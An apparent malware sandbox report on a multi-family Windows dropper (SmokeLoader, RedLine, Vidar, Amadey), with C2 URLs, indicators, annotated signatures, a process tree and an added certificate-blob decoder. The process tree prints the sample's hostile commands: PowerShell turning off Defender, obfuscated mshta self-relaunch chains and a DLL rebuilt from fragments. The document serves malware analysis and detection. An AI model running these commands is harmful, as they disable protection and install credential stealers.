Analysis

max time kernel: 22s
max time network: 154s
platform: windows7_x64
resource: win7-en-20211104
submitted: 23/11/2021, 00:32

Static task: static1
Behavioral task: behavioral1
  Sample: 9a5b2df52152e87d492bdea584da57b2.exe
  Resource: win7-en-20211104
Behavioral task: behavioral2
  Sample: 9a5b2df52152e87d492bdea584da57b2.exe
  Resource: win10-en-20211014

The signatures, yara matches and process tree below all come from behavioral1, the Windows 7 x64 run; the Windows 10 run is not reproduced on this page.
General

Target: 9a5b2df52152e87d492bdea584da57b2.exe
Size: 13.9MB
MD5: 9a5b2df52152e87d492bdea584da57b2
SHA1: 195f74fb957837638b0b2b8c16a061e1d001cca2
SHA256: 01e9a86fc7574104e12afa4836b39fca625d7d2bdcf04cf52dc0217b98497223
SHA512: 5ce1207dffba89cd29e7a72556497c36047bf0fa8e62aadec33d195c47f05a2dd546d598b77797486bd577d64d31f99293d199a566aad6b6f6a12391c13bfe84
Malware Config

Extracted: socelars
  C2: http://www.gianninidesign.com/

Extracted: amadey
  Version: 2.82
  C2: 185.215.113.45/g4MbvE/index.php

Extracted: smokeloader
  Version: 2020
  C2: http://membro.at/upload/
      http://jeevanpunetha.com/upload/
      http://misipu.cn/upload/
      http://zavodooo.ru/upload/
      http://targiko.ru/upload/
      http://vues3d.com/upload/

Extracted: metasploit
  Payload: windows/single_exec

Extracted: vidar
  Version: 48.6
  profile_id: 933
  C2 (dead-drop profiles the stealer reads to find its real server): https://mastodon.online/@valhalla
                                                                       https://koyu.space/@valhalla
Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

Process spawned unexpected child process (2 IoCs)
The sandbox's stock description says this typically indicates the parent process was compromised via an exploit or macro. For this particular parent the more usual explanation is WMI: WmiPrvSE.exe is the provider host that services Win32_Process.Create, so anything launched through WMI appears with it as its parent. wmiprvse.exe spawning rundll32.exe is worth an alert either way.

description | pid | pid_target | Process | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2544 | 2412 | rundll32.exe | 71
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3216 | 2412 | rundll32.exe | 71
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (1 IoCs)
resource | yara_rule
behavioral1/memory/3020-287-0x0000000000418F06-mapping.dmp | family_redline
PID 3020 is the second instance of Sat22bb7b5b45bcfb.exe in the process tree, i.e. the dropper re-launched itself and the RedLine payload was unpacked into that child copy.
SmokeLoader
Modular loader/backdoor trojan, in circulation since at least 2011.

Socelars Payload (1 IoCs)
resource | yara_rule
behavioral1/files/0x00050000000132ee-135.dat | family_socelars
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)

Vidar Stealer (1 IoCs)
resource | yara_rule
behavioral1/memory/2656-381-0x0000000000400000-0x0000000002BAB000-memory.dmp | family_vidar
PID 2656 is Worldoffer.exe in the process tree, so that dropped file is the Vidar payload whose config (profile_id 933, Mastodon dead-drop profiles) is listed above.

ASPack packer detections (the signature heading is missing from the capture; yara rule aspack_v212_v242 matches files packed with ASPack 2.12 to 2.42)
resource | yara_rule
behavioral1/files/0x00050000000132e2-63.dat | aspack_v212_v242
behavioral1/files/0x00050000000132e2-64.dat | aspack_v212_v242
behavioral1/files/0x0006000000013209-65.dat | aspack_v212_v242
behavioral1/files/0x0006000000013209-66.dat | aspack_v212_v242
behavioral1/files/0x00050000000132e6-69.dat | aspack_v212_v242
behavioral1/files/0x00050000000132e6-70.dat | aspack_v212_v242
Downloads MZ/PE file

Executes dropped EXE (19 IoCs)
pid | Process
588 | setup_install.exe
896 | Sat223a93262ea5e8d3.exe
2020 | Sat221d8ea09eebfe.exe
464 | Sat22c086fc4abe36.exe
1696 | Sat224bdd8c5c15.exe
1972 | Sat229cc46dc392f202c.exe
1156 | Sat2237fea859fe4.exe
1308 | Sat22d3494af9.exe
1076 | Sat22bb7b5b45bcfb.exe
1824 | Sat2232f60f4b1f89dd2.exe
1548 | conhost.exe
1400 | Sat22e3a2307e6bf2328.exe
1108 | Sat222e78780cd.exe
1936 | Sat2232f60f4b1f89dd2.tmp
984 | Sat2276be40cc7.exe
1376 | Sat223a93262ea5e8d3.tmp
2052 | Sat2232f60f4b1f89dd2.exe
2092 | Sat2232f60f4b1f89dd2.tmp
2284 | tkools.exe
Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Sat221d8ea09eebfe.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | Sat221d8ea09eebfe.exe
Loads dropped DLL (64 IoCs)
64 load events, aggregated here by process in order of first appearance (the capture lists every load separately):
pid | Process | loads
480 | 9a5b2df52152e87d492bdea584da57b2.exe | 3
588 | setup_install.exe | 8
1268 | cmd.exe | 1
1616 | cmd.exe | 1
840 | cmd.exe | 1
1736 | cmd.exe | 1
1936 | Sat2232f60f4b1f89dd2.tmp | 6
1900 | cmd.exe | 1
304 | 7281087.exe | 1
1644 | cmd.exe | 2
896 | Sat223a93262ea5e8d3.exe | 3
464 | Sat22c086fc4abe36.exe | 2
1156 | Sat2237fea859fe4.exe | 2
1972 | Sat229cc46dc392f202c.exe | 3
2012 | cmd.exe | 1
2020 | Sat221d8ea09eebfe.exe | 3
1076 | Sat22bb7b5b45bcfb.exe | 2
1572 | cmd.exe | 2
1824 | Sat2232f60f4b1f89dd2.exe | 3
1592 | cmd.exe | 1
1400 | Sat22e3a2307e6bf2328.exe | 2
1108 | Sat222e78780cd.exe | 2
1444 | cmd.exe | 2
1548 | conhost.exe | 2
984 | Sat2276be40cc7.exe | 2
2052 | Sat2232f60f4b1f89dd2.exe | 3
2092 | Sat2232f60f4b1f89dd2.tmp | 3
2284 | tkools.exe | 1
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Checks whether UAC is enabled
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Sat221d8ea09eebfe.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
Consistent with the Vidar config above: the two Mastodon profiles (mastodon.online, koyu.space) are dead-drop resolvers the stealer reads to obtain its real C2 address, so blocking the extracted URLs alone does not cut the channel.

Looks up external IP address via web service (1 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
7 | ip-api.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoCs)
pid | Process
2020 | Sat221d8ea09eebfe.exe
ThreadHideFromDebugger stops the thread from delivering debug events; on the same PID as the BIOS and EnableLUA registry reads, this is the dropper's environment check rather than an isolated trick.

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). The stock description calls this likely ransomware behaviour, but no ransomware family was identified in this run; in a stealer/loader bundle like this one, drive enumeration is more plausibly system profiling or file collection.
Creates scheduled task(s) (1 TTPs, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2812 | schtasks.exe
2216 | schtasks.exe

Kills process with taskkill (5 IoCs)
pid | Process
1996 | taskkill.exe
2388 | taskkill.exe
2144 | taskkill.exe
1720 | taskkill.exe
2408 | taskkill.exe
Modifies system certificate store
The key name and the certificate it holds are the genuine DigiCert Global Root CA (SHA-1 thumbprint A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436; the subject string "DigiCert Global Root CA" is readable as 446967694365727420476c6f62616c20526f6f74204341 in the hex). AuthRoot is the store where Windows' automatic root update caches a Microsoft-trusted root the first time a process validates a chain to it, and CryptoAPI performs that write inside the calling process, so this entry is consistent with Sat222e78780cd.exe making an HTTPS connection rather than with a rogue root being installed. Confirm that by recomputing the SHA-1 of the embedded certificate (property 32 of the Blob) instead of trusting the key name.

description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | Sat222e78780cd.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde | Sat222e78780cd.exe
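The Blob value is CryptoAPI's serialized-certificate format: a sequence of property records, each a little-endian uint32 property id, a reserved uint32 that is always 1, a uint32 length and the data. Read that way, the hex on this page starts with 04000000 01000000 10000000 (property 4, CERT_MD5_HASH_PROP_ID, 16 bytes), later carries 03000000 01000000 14000000 a8985d3a... (property 3, CERT_SHA1_HASH_PROP_ID, which is also the key name), 0b000000 01000000 12000000 4400690067006900430065007200740000 (property 11, the friendly name "DigiCert" in UTF-16LE) and 20000000 01000000 b3030000 308203af... (property 32, CERT_CERT_PROP_ID, a 947-byte DER certificate). The decoder below is an added example, not code from the report: it parses that layout and recomputes the thumbprint of the embedded certificate so the key name is not taken on trust. The property ids are the wincrypt.h constants; the blob it runs on is constructed around a fake certificate, as labelled in the code.

```python
"""Decode a CryptoAPI serialized-certificate registry Blob and verify its thumbprint.

Added example, not code from the sandbox report. Record layout (CryptoAPI serialized store
element, as written under SystemCertificates\<store>\Certificates\<SHA-1>\Blob):
    uint32 LE property id | uint32 LE reserved (always 1) | uint32 LE length | data
"""
import hashlib
import struct
from typing import Dict, Iterable, Tuple

# Property ids from wincrypt.h
CERT_SHA1_HASH_PROP_ID = 3       # 20-byte SHA-1 of the DER certificate; also the key name
CERT_MD5_HASH_PROP_ID = 4
CERT_FRIENDLY_NAME_PROP_ID = 11  # UTF-16LE, NUL-terminated
CERT_CERT_PROP_ID = 32           # the DER-encoded certificate itself


def parse_blob(blob: bytes) -> Dict[int, bytes]:
    """Walk the property records; raises ValueError on a malformed or truncated blob."""
    props: Dict[int, bytes] = {}
    off = 0
    while off < len(blob):
        if len(blob) - off < 12:
            raise ValueError(f"truncated record header at offset {off}")
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1:
            raise ValueError(f"unexpected reserved value {reserved} in property {prop_id}")
        if off + length > len(blob):
            raise ValueError(f"property {prop_id} claims {length} bytes past the end of the blob")
        props[prop_id] = blob[off:off + length]
        off += length
    return props


def build_blob(records: Iterable[Tuple[int, bytes]]) -> bytes:
    """Inverse of parse_blob; used here only to construct the test data below."""
    return b"".join(struct.pack("<III", pid, 1, len(data)) + data for pid, data in records)


def check_entry(key_name: str, blob: bytes) -> dict:
    """Recompute the SHA-1 of the embedded certificate and compare it with the stored hash and key name."""
    props = parse_blob(blob)
    cert = props.get(CERT_CERT_PROP_ID)
    if cert is None:
        raise ValueError("blob carries no certificate (property 32)")
    thumbprint = hashlib.sha1(cert).hexdigest()
    stored = props.get(CERT_SHA1_HASH_PROP_ID, b"").hex()
    name = props.get(CERT_FRIENDLY_NAME_PROP_ID, b"").decode("utf-16-le", "replace").rstrip("\x00")
    return {
        "friendly_name": name,
        "thumbprint": thumbprint,
        "looks_like_der": cert[:1] == b"\x30",  # outer ASN.1 SEQUENCE tag
        "matches_key_name": thumbprint == key_name.lower(),
        "matches_stored_hash": thumbprint == stored,
    }


# --- constructed test data: a fake 'certificate', not real DER and not from the report ---
FAKE_CERT = b"\x30\x82\x00\x14" + b"not-a-real-cert-blob"
GOOD_KEY = hashlib.sha1(FAKE_CERT).hexdigest().upper()  # what the registry key would be named
GOOD_BLOB = build_blob([
    (CERT_FRIENDLY_NAME_PROP_ID, "DigiCert".encode("utf-16-le") + b"\x00\x00"),
    (CERT_SHA1_HASH_PROP_ID, hashlib.sha1(FAKE_CERT).digest()),
    (CERT_CERT_PROP_ID, FAKE_CERT),
])
# Same key name and stored hash, but a different certificate slipped in under them.
TAMPERED_BLOB = build_blob([
    (CERT_FRIENDLY_NAME_PROP_ID, "DigiCert".encode("utf-16-le") + b"\x00\x00"),
    (CERT_SHA1_HASH_PROP_ID, hashlib.sha1(FAKE_CERT).digest()),
    (CERT_CERT_PROP_ID, b"\x30\x82\x00\x0fsomething-else!"),
])

if __name__ == "__main__":
    print(check_entry(GOOD_KEY, GOOD_BLOB))
    print(check_entry(GOOD_KEY, TAMPERED_BLOB))
```

On a Windows host the real value can be fed in with `winreg.QueryValueEx(winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436"), "Blob")[0]`, or the hex from this page can be passed through `bytes.fromhex`. A blob whose property-3 hash or key name disagrees with the SHA-1 of property 32, or whose property 32 is not the root you expect for that name, is the case that deserves attention; a matching, well-known root is the auto-update side effect described above.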
Script User-Agent (1 IoCs)
Uses user-agent string associated with script host/environment.
description | flow | ioc
HTTP User-Agent header | 10 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses (3 IoCs)
pid | Process
2020 | Sat221d8ea09eebfe.exe
1528 | powershell.exe
1144 | powershell.exe

Suspicious use of AdjustPrivilegeToken (36 IoCs)
PID 1108 Sat222e78780cd.exe requested 34 privileges in one sweep, which is typical of code that tries to enable every privilege LUID in turn rather than the one it needs: SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, plus LUIDs 31, 32, 33, 34 and 35, which the sandbox did not map to names (in winnt.h they are SeTrustedCredManAccessPrivilege, SeRelabelPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege).
PID 1528 powershell.exe and PID 1144 powershell.exe each requested SeDebugPrivilege.
Suspicious use of WriteProcessMemory (64 IoCs)
The capture repeats each writer/target pair seven times; aggregated here, with the sandbox's procid_target in parentheses. Every target is the writer's own direct child in the process tree, which is consistent with ordinary process creation (the parent writes the new process's parameters into it) rather than injection into an unrelated process. The list stops at exactly 64 entries, so the final pair is presumably cut off by a display cap.
pid | Process | wrote to pid (procid_target) | count
480 | 9a5b2df52152e87d492bdea584da57b2.exe | 588 (28) | 7
588 | setup_install.exe | 2008 (31) | 7
588 | setup_install.exe | 1488 (30) | 7
588 | setup_install.exe | 1268 (54) | 7
1488 | cmd.exe | 1144 (53) | 7
2008 | cmd.exe | 1528 (32) | 7
588 | setup_install.exe | 1616 (52) | 7
588 | setup_install.exe | 840 (33) | 7
588 | setup_install.exe | 1900 (48) | 7
588 | setup_install.exe | 1736 (47) | 1 (list truncated)
Processes

Indented by depth as the sandbox reported it; each entry gives the image path, the command line and the signatures attached to that process. Reading notes:
- PIDs are reused within the run (304, 464, 840, 1400, 1548, 1936 and 2668 each appear on two different processes), so match the signature tables above against the tree by PID together with parent and image, not by PID alone.
- The payloads that appear as separate depth-1 roots further down (Sat223a93262ea5e8d3.exe, Sat221d8ea09eebfe.exe, Sat224bdd8c5c15.exe) are the children of the cmd.exe /c wrappers under setup_install.exe that the sandbox did not link to their parent.
- Before launching any payload, setup_install.exe uses PowerShell to add %TEMP% as a Defender exclusion and to turn off real-time monitoring, sample submission and cloud (MAPS) reporting.
- The is-*.tmp\*.tmp processes with a /SL5= argument are the Inno Setup bootstrap of the bundled installers.
- The mshta.exe chains run inline VBScript in two steps. First they copy the dropped EXE to a random name in the parent folder, start the copy with an opaque argument and taskkill the original; the copy repeats the same script, and because the argument is now present the taskkill branch is skipped. Then they rebuild a DLL from dropped fragments ('echo | set /p = "MZ"' writes back the stripped MZ signature, 'copy /b' concatenates the parts), load it with regsvr32 -S ... -u (DllUnregisterServer) or msiexec -Y (DllRegisterServer), and delete the fragments.
- The tkools.exe branch (a scheduled task every minute plus redirecting the user's Startup shell folder to the drop directory) matches Amadey's documented persistence routine, and Amadey is one of the configs extracted above; taskeng.exe launching tkools.exe near the end of the tree is that task firing.
- Chrome5.exe and services64.exe are the only processes whose children come from System32 rather than SysWOW64, so they are 64-bit. Each spawns conhost.exe with its own path as the argument, and that conhost.exe is the parent of the 'services64' logon task creation; conhost.exe does not normally take a user-mode executable as its argument, so treat it as the process actually running the payload.
- makecab.exe compressing a CbsPersist log is normal Windows servicing activity that fell inside the capture window. svchost.exe -k SystemNetworkService is not a default svchost service group name, so identify the service registered under it before dismissing it.

[1] C:\Users\Admin\AppData\Local\Temp\9a5b2df52152e87d492bdea584da57b2.exe  (PID 480)
    command: "C:\Users\Admin\AppData\Local\Temp\9a5b2df52152e87d492bdea584da57b2.exe"
    signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\setup_install.exe  (PID 588)
      command: "C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\setup_install.exe"
      signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 1488)
        command: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        signatures: Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1144)
          command: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 2008)
        command: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
        signatures: Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1528)
          command: powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 840)
        command: C:\Windows\system32\cmd.exe /c Sat22c086fc4abe36.exe
        signatures: Loads dropped DLL
      [4] C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat22c086fc4abe36.exe  (PID 464)
          command: Sat22c086fc4abe36.exe
          signatures: Executes dropped EXE; Loads dropped DLL
        [5] C:\Users\Admin\AppData\Roaming\6929300.exe  (PID 3032)
            command: "C:\Users\Admin\AppData\Roaming\6929300.exe"
        [5] C:\Users\Admin\AppData\Roaming\7281087.exe  (PID 304)
            command: "C:\Users\Admin\AppData\Roaming\7281087.exe"
            signatures: Loads dropped DLL
          [6] C:\Users\Admin\AppData\Roaming\27413463\2741273727412737.exe  (PID 1896)
              command: "C:\Users\Admin\AppData\Roaming\27413463\2741273727412737.exe"
        [5] C:\Users\Admin\AppData\Roaming\1652085.exe  (PID 1568)
            command: "C:\Users\Admin\AppData\Roaming\1652085.exe"
        [5] C:\Users\Admin\AppData\Roaming\8073715.exe  (PID 2292)
            command: "C:\Users\Admin\AppData\Roaming\8073715.exe"
        [5] C:\Users\Admin\AppData\Roaming\6454345.exe  (PID 2496)
            command: "C:\Users\Admin\AppData\Roaming\6454345.exe"
        [5] C:\Users\Admin\AppData\Roaming\4551210.exe  (PID 1072)
            command: "C:\Users\Admin\AppData\Roaming\4551210.exe"
          [6] C:\Users\Admin\AppData\Roaming\5920019.exe  (PID 2380)
              command: "C:\Users\Admin\AppData\Roaming\5920019.exe"
            [7] C:\Windows\SysWOW64\mshta.exe  (PID 1776)
                command: "C:\Windows\System32\mshta.exe" VbscriPt: clOSE(cREateObject( "wSCrIpt.ShELl" ). RUn ( "cMD.exE /q /R tYPe ""C:\Users\Admin\AppData\Roaming\5920019.exe"" > ..\81YF5TZIW.ExE&& sTarT ..\81YF5TZIW.exE /PvWRgT~XF843YaMCVQMy4mT& if """" == """" for %p In ( ""C:\Users\Admin\AppData\Roaming\5920019.exe"" ) do taskkill /f /iM ""%~Nxp"" " , 0 ,TrUE ) )
              [8] C:\Windows\SysWOW64\cmd.exe  (PID 464)
                  command: "C:\Windows\System32\cmd.exe" /q /R tYPe "C:\Users\Admin\AppData\Roaming\5920019.exe" > ..\81YF5TZIW.ExE&& sTarT ..\81YF5TZIW.exE /PvWRgT~XF843YaMCVQMy4mT&if "" == "" for %p In ( "C:\Users\Admin\AppData\Roaming\5920019.exe" ) do taskkill /f /iM "%~Nxp"
                [9] C:\Users\Admin\AppData\Local\Temp\81YF5TZIW.ExE  (PID 1256)
                    command: ..\81YF5TZIW.exE /PvWRgT~XF843YaMCVQMy4mT
                  [10] C:\Windows\SysWOW64\mshta.exe  (PID 2724)
                      command: "C:\Windows\System32\mshta.exe" VbscriPt: clOSE(cREateObject( "wSCrIpt.ShELl" ). RUn ( "cMD.exE /q /R tYPe ""C:\Users\Admin\AppData\Local\Temp\81YF5TZIW.ExE"" > ..\81YF5TZIW.ExE&& sTarT ..\81YF5TZIW.exE /PvWRgT~XF843YaMCVQMy4mT& if ""/PvWRgT~XF843YaMCVQMy4mT"" == """" for %p In ( ""C:\Users\Admin\AppData\Local\Temp\81YF5TZIW.ExE"" ) do taskkill /f /iM ""%~Nxp"" " , 0 ,TrUE ) )
                    [11] C:\Windows\SysWOW64\cmd.exe  (PID 3356)
                        command: "C:\Windows\System32\cmd.exe" /q /R tYPe "C:\Users\Admin\AppData\Local\Temp\81YF5TZIW.ExE" > ..\81YF5TZIW.ExE&& sTarT ..\81YF5TZIW.exE /PvWRgT~XF843YaMCVQMy4mT&if "/PvWRgT~XF843YaMCVQMy4mT" == "" for %p In ( "C:\Users\Admin\AppData\Local\Temp\81YF5TZIW.ExE" ) do taskkill /f /iM "%~Nxp"
                  [10] C:\Windows\SysWOW64\mshta.exe  (PID 4032)
                      command: "C:\Windows\System32\mshta.exe" VBScrIPt: CLoSe( crEaTeoBjECt ("Wscript.sHELl" ). run ( "C:\Windows\system32\cmd.exe /Q /R eChO | SeT /p = ""MZ"" > UXzDKCI.vL & Copy /B /y UXZDKCI.VL + BvNdvRB2.Vn+ SnmqF.N ..\8Kw4W.V~W & sTarT regsvr32 -S ..\8kw4W.V~W -u & deL /q * " , 0 , TRUE ) )
                    [11] C:\Windows\SysWOW64\cmd.exe  (PID 3132)
                        command: "C:\Windows\system32\cmd.exe" /Q /R eChO | SeT /p = "MZ" > UXzDKCI.vL &Copy /B /y UXZDKCI.VL + BvNdvRB2.Vn+ SnmqF.N ..\8Kw4W.V~W & sTarT regsvr32 -S ..\8kw4W.V~W -u & deL /q *
                      [12] C:\Windows\SysWOW64\cmd.exe  (PID 3852)
                          command: C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>UXzDKCI.vL"
                      [12] C:\Windows\SysWOW64\cmd.exe  (PID 2136)
                          command: C:\Windows\system32\cmd.exe /S /D /c" eChO "
                      [12] C:\Windows\SysWOW64\regsvr32.exe  (PID 2504)
                          command: regsvr32 -S ..\8kw4W.V~W -u
                [9] C:\Windows\SysWOW64\taskkill.exe  (PID 1720)
                    command: taskkill /f /iM "5920019.exe"
                    signatures: Kills process with taskkill
          [6] C:\Users\Admin\AppData\Roaming\3957515.exe  (PID 2732)
              command: "C:\Users\Admin\AppData\Roaming\3957515.exe"
            [7] C:\Users\Admin\AppData\Roaming\3957515.exe  (PID 3224)
                command: "C:\Users\Admin\AppData\Roaming\3957515.exe"
        [5] C:\Users\Admin\AppData\Roaming\4521525.exe  (PID 768)
            command: "C:\Users\Admin\AppData\Roaming\4521525.exe"
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 304)
        command: C:\Windows\system32\cmd.exe /c Sat2237fea859fe4.exe
      [4] C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2237fea859fe4.exe  (PID 1156)
          command: Sat2237fea859fe4.exe
          signatures: Executes dropped EXE; Loads dropped DLL
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 1400)
        command: C:\Windows\system32\cmd.exe /c Sat220d71535d812f8d.exe /mixtwo
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 1936)
        command: C:\Windows\system32\cmd.exe /c Sat229cc46dc392f202c.exe
      [4] C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat229cc46dc392f202c.exe  (PID 1972)
          command: Sat229cc46dc392f202c.exe
          signatures: Executes dropped EXE; Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat229cc46dc392f202c.exe  (PID 1548)
            command: "C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat229cc46dc392f202c.exe" -u
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 1444)
        command: C:\Windows\system32\cmd.exe /c Sat2276be40cc7.exe
        signatures: Loads dropped DLL
      [4] C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2276be40cc7.exe  (PID 984)
          command: Sat2276be40cc7.exe
          signatures: Executes dropped EXE; Loads dropped DLL
        [5] C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2276be40cc7.exe  (PID 2668)
            command: "C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat2276be40cc7.exe"
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 1592)
        command: C:\Windows\system32\cmd.exe /c Sat222e78780cd.exe
        signatures: Loads dropped DLL
      [4] C:\Users\Admin\AppData\Local\Temp\7zS0E1E32D5\Sat222e78780cd.exe  (PID 1108)
          command: Sat222e78780cd.exe
          signatures: Executes dropped EXE; Loads dropped DLL; Modifies system certificate store; Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\SysWOW64\cmd.exe  (PID 2356)
            command: cmd.exe /c taskkill /f /im chrome.exe
          [6] C:\Windows\SysWOW64\taskkill.exe  (PID 2388)
              command: taskkill /f /im chrome.exe
              signatures: Kills process with taskkill
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 1600)
        command: C:\Windows\system32\cmd.exe /c Sat22c52b52ae9743c47.exe
    [3] C:\Windows\SysWOW64\cmd.exe  (PID 1572)
        command: C:\Windows\system32\cmd.exe /c Sat22e3a2307e6bf2328.exe
